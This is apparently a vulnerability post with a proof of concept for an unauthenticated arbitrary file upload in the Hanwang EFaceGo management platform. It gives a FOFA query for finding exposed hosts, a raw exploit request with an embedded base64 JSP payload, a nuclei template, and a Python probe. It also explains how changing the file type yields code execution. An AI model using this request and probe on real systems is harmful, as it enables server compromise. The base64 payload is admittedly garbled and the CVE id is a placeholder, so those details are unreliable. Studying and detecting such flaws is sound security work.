Disclaimer
Do not use the techniques described in this article for illegal testing. Any direct or indirect consequences or losses arising from the dissemination or use of the information or tools provided here are the sole responsibility of the user; the author bears no responsibility for any adverse outcome. This article is for learning purposes only.
Vulnerability description:
The /updateVisitorMapConfig.do endpoint of the 汉王e脸通综合管理平台 (Hanwang EFaceGo integrated management platform) has an arbitrary file upload vulnerability. The endpoint accepts a JSON body without any authentication; as the PoC below shows, the caller chooses both the stored file's extension (fileType) and its content (updatedPhoto, base64-encoded). An attacker can therefore write a file of arbitrary type and content to the server, which can lead to remote code execution or full compromise of the host if the upload directory is served by the application.
Affected versions:
汉王e脸通综合管理平台 (Hanwang EFaceGo integrated management platform); no version range is given.
FOFA:
title="汉王智慧园区" && body="<link rel=\"icon\" href=\"/logo.png\""
POC:
POST /manage/visitorMapConfig/updateVisitorMapConfig.do?recoToken=
Host: 
Content-Type: application/json

{"id":1,"mapName":"{{randstr}}","fileType":"txt","updatedPhoto":"PCUgb3V0LnByaW50bG4oInBib31qb,5yZmlwbXBsc3VrZGVjenVkc2VmeG15d2UiKTsgbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFN1cnZsZXBQYXRoKCkpKS5kZWxldGUoKTsgJT4"}
Notes: no session or token is needed (recoToken may be left empty). fileType is the extension the server is asked to store and updatedPhoto the base64-encoded file content. The payload above decodes to a short JSP that prints a marker string and then deletes itself (a java.io.File(...).delete() on its own path), but because fileType is "txt" it would be stored as plain text; code execution requires an extension the container executes, such as "jsp", and an upload directory that the application serves. The base64 value as reproduced here contains a stray comma and does not decode cleanly, so treat it as illustrative rather than copy-and-paste ready.
Nuclei template:
id: CVE-2025-ZZZZZ

info:
  name: Hanwang EFaceGo Arbitrary File Upload
  author: ProjectDiscoveryAI
  severity: critical
  description: |
    Hanwang EFaceGo contains an arbitrary file upload vulnerability in the /manage/visitorMapConfig/updateVisitorMapConfig.do endpoint
    that allows unauthenticated attackers to upload malicious files and potentially execute server-side code.
  reference:
    - https://www.hanwang.com.cn/security
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-ZZZZZ
    - https://cwe.mitre.org/data/definitions/434.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 1
    vendor: hanwang
    product: efacego
    fofa-query: 'title="汉王智慧园区" && body="<link rel=\"icon\" href=\"/logo.png\""'
  tags: cve,cve2025,hanwang,efacego,file-upload,rce,unrestricted

variables:
  content: "{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/manage/visitorMapConfig/updateVisitorMapConfig.do?recoToken={{randstr}}"
    headers:
      Content-Type: application/json
    body: |
      {
        "id":1,
        "mapName":"{{randstr}}",
        "fileType":"txt",
        "updatedPhoto":"{{base64(content)}}"
      }
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "success"
          - "file uploaded"
        condition: or
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "\"message\":\"([^\"]+)\""
The template uploads a random text marker with a "txt" extension, so it is non-destructive, and it reports a hit on any HTTP 200 whose body contains "success" or "file uploaded". That is evidence that the endpoint accepted an unauthenticated write, not proof of code execution; confirm by retrieving the stored file before reporting it as exploitable.
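The following Python probe is an added example, not code from the original post or from the vendor. It builds the same request the PoC and the nuclei template send (a harmless text marker, base64-encoded, with a caller-chosen fileType) and classifies the response exactly as the template's matchers and extractor do. The helper names are my own, and the JSON responses in SAMPLE_RESPONSES are constructed for illustration, not captured from a real system.

```python
# Added example (not from the original page or the vendor): build the
# updateVisitorMapConfig.do probe and classify the reply like the nuclei
# template does. Helper names are assumptions; SAMPLE_RESPONSES is constructed.
import base64
import json
import re
import secrets
import string
from urllib import request as urlrequest
from urllib.error import HTTPError

ENDPOINT = "/manage/visitorMapConfig/updateVisitorMapConfig.do"
# The template's word matcher: case-sensitive, either string is enough.
SUCCESS_MARKERS = ("success", "file uploaded")
# The template's extractor: first "message" value in the JSON body.
MESSAGE_RE = re.compile(r'"message":"([^"]+)"')


def rand_str(n: int = 12) -> str:
    """Stand-in for nuclei's {{randstr}}."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def build_probe(marker: str, file_type: str = "txt") -> dict:
    """JSON body in the PoC's shape. The content is a harmless text marker and
    file_type is the extension the server is asked to store. Keep 'txt' for a
    non-destructive check; only an executable extension (e.g. 'jsp') turns the
    write into code execution, and only if the upload directory is served."""
    return {
        "id": 1,
        "mapName": rand_str(),
        "fileType": file_type,
        "updatedPhoto": base64.b64encode(marker.encode()).decode(),
    }


def build_request(base_url: str, body: dict, reco_token: str = "") -> urlrequest.Request:
    """Unauthenticated POST; recoToken is any value (the PoC leaves it empty)."""
    url = f"{base_url.rstrip('/')}{ENDPOINT}?recoToken={reco_token or rand_str()}"
    return urlrequest.Request(
        url,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def classify(status: int, body: str) -> dict:
    """Mirror the template: status 200 AND a success marker in the body.
    'accepted' only means the endpoint took an unauthenticated write; fetch
    the stored file before calling the target exploitable."""
    accepted = status == 200 and any(m in body for m in SUCCESS_MARKERS)
    m = MESSAGE_RE.search(body)
    return {"accepted": accepted, "message": m.group(1) if m else None}


def send_probe(base_url: str, marker: str, timeout: float = 10.0) -> dict:
    """Send the probe over the network and classify the answer."""
    req = build_request(base_url, build_probe(marker))
    try:
        with urlrequest.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode(errors="replace"))
    except HTTPError as err:  # a non-2xx reply still carries a body
        return classify(err.code, err.read().decode(errors="replace"))


# Constructed sample replies (not captured from a real system) showing how
# the classifier separates an accepted write from a rejection or an error.
SAMPLE_RESPONSES = {
    "accepted": (200, '{"code":0,"message":"success","data":null}'),
    "rejected": (200, '{"code":401,"message":"login required","data":null}'),
    "error": (500, '{"message":"success"}'),
}

if __name__ == "__main__":
    for name, (status, body) in SAMPLE_RESPONSES.items():
        print(name, classify(status, body))
```

Run it against a lab host with send_probe("http://host:port", "marker-" + rand_str()) only on systems you are authorised to test; the offline part (build_probe, build_request, classify) is what the checks below exercise.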